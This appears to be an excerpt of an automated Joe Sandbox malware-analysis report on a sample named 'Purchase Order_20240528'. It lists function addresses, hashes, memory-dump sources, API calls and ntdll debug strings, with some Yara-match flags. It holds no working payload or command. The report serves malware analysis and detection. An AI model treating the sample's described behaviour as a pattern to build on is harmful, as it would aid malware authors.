                                  • Instruction ID: 119f454aec3e1f0769b613b9e84411ff55839c1fcea223a15ef3740b23d64b2b
                                  • Opcode Fuzzy Hash: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                  • Instruction Fuzzy Hash: E490026160240003410575584814657401E97E0201B55C121F5018690EC52589927225
                                  Function 01622DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                  • Instruction ID: 49bc0e817323dcb92121d463c592645275d51ac61b7b22abb9bbe65dbf089442
                                  • Opcode Fuzzy Hash: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                  • Instruction Fuzzy Hash: 2090023160140413D11175584904747001D97D0241F95C512B4428658ED6568A53B221
                                  Function 01622C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                  • Instruction ID: a5faf4f3e1ada70566cc8fd050fd4045ae70dadfc26c755d57589f6cf05efb5e
                                  • Opcode Fuzzy Hash: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                  • Instruction Fuzzy Hash: 2E90023160148802D1107558880478B001997D0301F59C511B8428758EC69589927221
                                  Function 016235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                  • Instruction ID: 6b0abfa080f58805b4afb7f003ea9affff3d96b21fa665befba6a9d8f8c98f6a
                                  • Opcode Fuzzy Hash: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                  • Instruction Fuzzy Hash: 9A900231A0550402D10075584914747101997D0201F65C511B4428668EC7958A5276A2
                                  Function 0041402B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 004140AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 3a8e7344caa9dce6007bb169546918b974dd2587ac9bc654b05d3ffd82c4c9ec
                                  • Instruction ID: ef2cd7333192803d24dfae15859473f3f85994460fa10dd3f17fd208c4f7ddc2
                                  • Opcode Fuzzy Hash: 3a8e7344caa9dce6007bb169546918b974dd2587ac9bc654b05d3ffd82c4c9ec
                                  • Instruction Fuzzy Hash: 6711E9B1D0025C7ADB10ABD59C81DEFBB7CDF84398F008069FA1467241D2794E064BF9
                                  Function 00414033 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15 414033-41407b call 42d463 call 42de73 call 4179d3 call 404a53 24 414081-41409d 15->24 25 41407c call 4247c3 15->25 26 4140bd-4140c3 24->26 27 41409f-4140ae PostThreadMessageW 24->27 25->24 27->26 28 4140b0-4140ba 27->28 28->26
                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 004140AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 7d79e5cd185e6ae716d6c74e02a54555389d0ab3d77fe80dd74c53837e05fc6d
                                  • Instruction ID: 384a6e8845f89a293fddf371e3ca3a9a005896865627af5530ae2eee72214b65
                                  • Opcode Fuzzy Hash: 7d79e5cd185e6ae716d6c74e02a54555389d0ab3d77fe80dd74c53837e05fc6d
                                  • Instruction Fuzzy Hash: 8601C8B1D0015C7AEB10AAD19C81DEFBB7CDF80798F04806AFA1467141D67C4E064BF9
                                  Function 0041401F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 29 41401f-414021 30 414081-41409d 29->30 31 414023-41402a 29->31 32 4140bd-4140c3 30->32 33 41409f-4140ae PostThreadMessageW 30->33 33->32 34 4140b0-4140ba 33->34 34->32
                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 004140AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction ID: 413ca1c7bc6544747e0d95237f84621517fbf5ed2e267f46896169ec2b8f9604
                                  • Opcode Fuzzy Hash: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction Fuzzy Hash: 9EF0A777E4014C769B108AD96C828EEFBBCDE94364F0081A7EE18E7200D2394D424BA6
                                  Function 004179D3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 380 4179d3-4179fc call 42e0c3 383 417a02-417a10 call 42e5e3 380->383 384 4179fe-417a01 380->384 387 417a20-417a31 call 42ca93 383->387 388 417a12-417a1d call 42e883 383->388 394 417a33-417a47 LdrLoadDll 387->394 395 417a4a-417a4d 387->395 388->387 394->395
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A45
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction ID: bfa767b54ff4edb4b9491ed2217fcb575d9024015dfba4bbcfc37fa648dcb672
                                  • Opcode Fuzzy Hash: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction Fuzzy Hash: C9015EB1E4020DABDF10DBE1DC42FDEB3789F14308F0041AAE90897241F635EB448B95
                                  Function 0042B853 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 396 42b853-42b897 call 404ae3 call 42c5b3 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,0041E19B,?,?,00000000,?,0041E19B,?,?,?), ref: 0042B892
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction ID: f61b25608699206a629d7f99839a3876da92859892d862afadf7fbbe1cce9547
                                  • Opcode Fuzzy Hash: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction Fuzzy Hash: 76E06DB23002157FCA10EE5AEC41F9B77ACEFC5710F00401AF909A7241CAB0BA108BB9
                                  Function 0042B8A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 401 42b8a3-42b8e4 call 404ae3 call 42c5b3 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00000ADC,00000007,00000000,00000004,00000000,004172BB,000000F4,?,?,?,?,?), ref: 0042B8DF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction ID: 6f5796991c5eb4dfc6a81e2c3c15b6c012848cc12606d7a9283871a648ca7288
                                  • Opcode Fuzzy Hash: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction Fuzzy Hash: A4E065B6614214BBCA10EE5AEC41F9B77ACEFC8750F00401AFA18A7341C670BA108BB8
                                  Function 0042B8F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 411 42b8f3-42b92f call 404ae3 call 42c5b3 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,?,?,4326212F,?,?,4326212F), ref: 0042B92A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 6139245699a32d14016756140353c14a79df01f78cdaf14cdd69df58b113f924
                                  • Instruction ID: f961bc45a0b5c8375fa7d540dbc00f60224546b7d74deae934d82caa4fcf49e1
                                  • Opcode Fuzzy Hash: 6139245699a32d14016756140353c14a79df01f78cdaf14cdd69df58b113f924
                                  • Instruction Fuzzy Hash: 01E04F762002147BC520EA5ADC41F9B775CDBC5724F40401AFB4867245CA71F95087F8
                                  Function 004179C6 Relevance: 1.5, APIs: 1, Instructions: 21libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A45
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction ID: b182473a06fdb04f11debc91ba2fcb4fe64166369566d50de388a4a8d297d1d7
                                  • Opcode Fuzzy Hash: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction Fuzzy Hash: E9E04675A4400EAEDB00CBD4D892FDDB7B4AF54308F048296E908DB240E634EB448B59
                                  Function 01622C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                  • Instruction ID: 0ecff2aca33659c0c3924ebc81bfa6ca81043a41d1ddbae41014f68c756c0c9a
                                  • Opcode Fuzzy Hash: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                  • Instruction Fuzzy Hash: B4B09B71D019D5C5DA51E7644E08717791477D0701F15C165E2034751F4738C1D1F675

                                  Non-executed Functions

                                  Function 01662349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                  • Instruction ID: 8250cbb38c769c1152cab639821971c4973feb0ac4e95b2fb097ee145ada4182
                                  • Opcode Fuzzy Hash: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                  • Instruction Fuzzy Hash: 8A928C71604342AFE721CE29CC90B6BBBE9BB84754F04492DFA95DB390D770E844CB92
                                  Function 01618620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                  Download Yara Rule
                                  Strings
                                  • Thread identifier, xrefs: 0165553A
                                  • Invalid debug info address of this critical section, xrefs: 016554B6
                                  • Critical section debug info address, xrefs: 0165541F, 0165552E
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554E2
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01655543
                                  • Critical section address., xrefs: 01655502
                                  • Critical section address, xrefs: 01655425, 016554BC, 01655534
                                  • Address of the debug info found in the active list., xrefs: 016554AE, 016554FA
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0165540A, 01655496, 01655519
                                  • undeleted critical section in freed memory, xrefs: 0165542B
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554CE
                                  • 8, xrefs: 016552E3
                                  • corrupted critical section, xrefs: 016554C2
                                  • double initialized or corrupted critical section, xrefs: 01655508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                  • Instruction ID: 454d64714f95e5f71af499e13c1519b3a594014a5269c1a2a38d60f41322fcb8
                                  • Opcode Fuzzy Hash: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                  • Instruction Fuzzy Hash: 2681ACB0A01359EFDB60CF99CC44BAEBBB9BB49B04F14411DF905BB241D3B5A941CB90
                                  Function 01690274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 3446177414-1700792311
                                  • Opcode ID: 959e306c4a6cfe6e6837945b16bb2ac65d9afd3183ddedea40888b7c438de3f5
                                  • Instruction ID: c4b3bd2116989e9ad52b71eea702bb38d4bcaf7b79733777156fd5a1a7cbf69e
                                  • Opcode Fuzzy Hash: 959e306c4a6cfe6e6837945b16bb2ac65d9afd3183ddedea40888b7c438de3f5
                                  • Instruction Fuzzy Hash: 66D1CA31A01686EFDF22DF68CC40AA9BBFAFF8A710F098059F5459B752C7349981CB54
                                  Function 016129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0165261F
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01652412
                                  • @, xrefs: 0165259B
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01652602
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016524C0
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01652506
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01652624
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016522E4
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01652409
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016525EB
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01652498
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: 6ab01f1485abc08f47b2e41210f71233f26d810d12aad5a2dbf0499d5e01d59f
                                  • Instruction ID: a1b577d40bf9a0c7e8848069b1837d2e9816e8248e3a0c96246fe22db5828813
                                  • Opcode Fuzzy Hash: 6ab01f1485abc08f47b2e41210f71233f26d810d12aad5a2dbf0499d5e01d59f
                                  • Instruction Fuzzy Hash: 96027FB1D002299FDB61DB54CC90BAAB7B8AF54704F0441DEEB09A7241EB309F85CF69
                                  Function 01688B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: a8f6e4955231c5bb919c2256db4354d3ab3c98f3c83a13636d7f644309d2a5d2
                                  • Instruction ID: e83fe953a741d2efeab6acb9013e249581b863a8105e2283392a1255f259c584
                                  • Opcode Fuzzy Hash: a8f6e4955231c5bb919c2256db4354d3ab3c98f3c83a13636d7f644309d2a5d2
                                  • Instruction Fuzzy Hash: 3E519D725053119BD329EF188C84BABBBECBFD8350F544A1DF99987285E770D604CB92
                                  Function 015D645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 015D656C
                                    • Part of subcall function 015D65B5: RtlDebugPrintTimes.NTDLL ref: 015D6664
                                    • Part of subcall function 015D65B5: RtlDebugPrintTimes.NTDLL ref: 015D66AF
                                  Strings
                                  • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01639A2A
                                  • LdrpInitShimEngine, xrefs: 016399F4, 01639A07, 01639A30
                                  • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 016399ED
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01639A11, 01639A3A
                                  • Getting the shim user exports failed with status 0x%08lx, xrefs: 01639A01
                                  • apphelp.dll, xrefs: 015D6496
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-204845295
                                  • Opcode ID: 65bfed2a5161af2472bc0efd4b3801fa128c8da53ca875ffe7b9f1595bbb7c74
                                  • Instruction ID: 95244aafa106e526f599f11b4cf6bf9fc19376d0b1f66b123f4ac5ccbe7b9614
                                  • Opcode Fuzzy Hash: 65bfed2a5161af2472bc0efd4b3801fa128c8da53ca875ffe7b9f1595bbb7c74
                                  • Instruction Fuzzy Hash: 095190716083059FE724DF68CC81BAB77E5FBC4748F40091DE9859B250DBB0E946CB96
                                  Function 016689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  • VerifierDebug, xrefs: 01668CA5
                                  • HandleTraces, xrefs: 01668C8F
                                  • AVRF: -*- final list of providers -*- , xrefs: 01668B8F
                                  • VerifierFlags, xrefs: 01668C50
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01668A3D
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01668A67
                                  • VerifierDlls, xrefs: 01668CBD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
